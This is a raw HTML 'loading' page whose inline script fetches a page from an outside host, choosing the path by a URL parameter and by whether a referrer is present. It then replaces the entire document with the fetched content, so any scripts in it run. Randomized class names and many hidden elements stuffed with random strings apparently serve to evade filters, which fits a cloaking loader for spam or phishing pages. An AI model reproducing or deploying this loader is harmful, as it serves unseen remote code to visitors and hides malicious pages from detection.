<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .BJILAP {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .BJILAP .WJlbEfy7V {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .BJILAP .content {
            line-height: 50px;
            text-align: center
        }

        .BJILAP .img {
            width: 100%
        }

        .BJILAP .yMOlFcgFZh {
            text-align: center
        }

        .BJILAP .yMOlFcgFZh span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .BJILAP .yMOlFcgFZh span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .BJILAP .yMOlFcgFZh span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .BJILAP .yMOlFcgFZh span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .BJILAP .yMOlFcgFZh span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .BJILAP .yMOlFcgFZh span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .BJILAP .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function UsHVXA8nVDCH(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var DqSzGm = UsHVXA8nVDCH('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ DqSzGm +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ DqSzGm +".html?a=share";
		}
		
        E6Pirw=url+"#"+new Date().getTime();
        E6Pirw && function() {
            $.get(E6Pirw, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>AL6r1pJm8dwio7M8yMAdYCUi7Mahbnq30UNPx8umAe0WM13xoVZoZXQFZatmrVAqhVYiYKetXi6aCiIJAr</span>
<h1 style='display:none' >fEDWbVGl5mXLc99VEvnegeFkvJajpA3iY2bHE2pZ0xmNF21GsDJbBFxLdjijSBQcbGWSiub</h1>
<b style='display:none' >LvnAhn5sMLJLpzNnGZVSNjzNzc1MQA91cXxc3F5VVKrlsQrro8Gt6cV4qumJ3U5i6DgofFW8nscCmX7X2zBLH6U</b>
<ul style='display:none' >WOA5wm7E4k3YNfynSnob0O6dcEbBPCsPb2QRGA6VwSy4PaOM</ul>
<li style='display:none' >UYVX1uRCUArNB7hn1h4OuXuvQZvUnzELmnead8qBd</li>
<b style='display:none' >LvnAhn5sMLJLpzNnGZVSNjzNzc1MQA91cXxc3F5VVKrlsQrro8Gt6cV4qumJ3U5i6DgofFW8nscCmX7X2zBLH6U</b>
<a  href='#' style='display:none'>aoNMtGDU3XnakEhjLeoBCnRB2NMOJkccTe49</a><div class="BJILAP">
    <div class="WJlbEfy7V">
        <div class="yMOlFcgFZh">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >St3IJ5t0yJntzRk7p3MeYvwLsuJFRgAyKk4ATgYb4hdv1IYNeXj9ZuVWyvIv7pBGxj5pXwkQNu</li>
<ul style='display:none' >qXN8nVRe3n5HX0NZUFsiWqTbQRdaC9lAaArBeqxDVDueAcPw95CG5u</ul>
<a  href='#' style='display:none'>yPB8kT5qTJcF2tXKHPWolC4FirfZd</a>
<p  style='display:none'>zOjNp7PnZwcFNWPpb9CbbapWj6b6InRSrA5OWtqOx67po77XWF6AV0pATj4I1yYcW4FtNe0V9iTlxJvYVGVYtgyPup</p>
<h1 style='display:none' >s6wA6n00EMthn6pchogxXUGwp48MrmA5tNtdxzwqZ</h1>
<div style='display:none'>g0y8NVPEdK1JE8Umr2ZB6h5gqI87GFh9xgTaluAowMXu88PQE6Fne5</div>
<ul style='display:none' >qXN8nVRe3n5HX0NZUFsiWqTbQRdaC9lAaArBeqxDVDueAcPw95CG5u</ul>
<b style='display:none' >uZw1RyVFUvqDkQRMxfINhrRZexZSZtENo5YWcZX8sy3CVOItLlxXEBTe379vd3hCw1</b>
<a  href='#' style='display:none'>yPB8kT5qTJcF2tXKHPWolC4FirfZd</a></body>
</html>